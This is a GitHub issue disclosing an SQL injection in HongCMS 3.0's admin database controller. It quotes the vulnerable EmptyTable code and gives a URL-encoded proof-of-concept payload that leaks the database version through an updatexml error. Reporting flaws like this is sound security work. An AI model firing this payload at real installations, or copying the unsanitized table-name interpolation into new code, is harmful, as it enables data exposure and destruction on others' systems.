Skip to content

HongCMS 3.0 - SQL Injection #4

Open
@Hzllaga

Description

@Hzllaga

Vulnerability file: admin\controllers\database.php

private function EmptyTable($tablename)
{
    $this->db->exe("DELETE FROM `$tablename`");
    $msg = '已完成清空数据库表: ' . $tablename . '<br/>';

    return $msg;
}

The $tablename parameter controllable.

POC (Administrator Privilege):

/admin/index.php/database/operate?dbaction=emptytable&tablename=hong_vvc%60%20where%20vvcid%3D1%20or%20updatexml%282%2Cconcat%280x7e%2C%28version%28%29%29%29%2C0%29%20or%20%60

tim 20180626123926

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions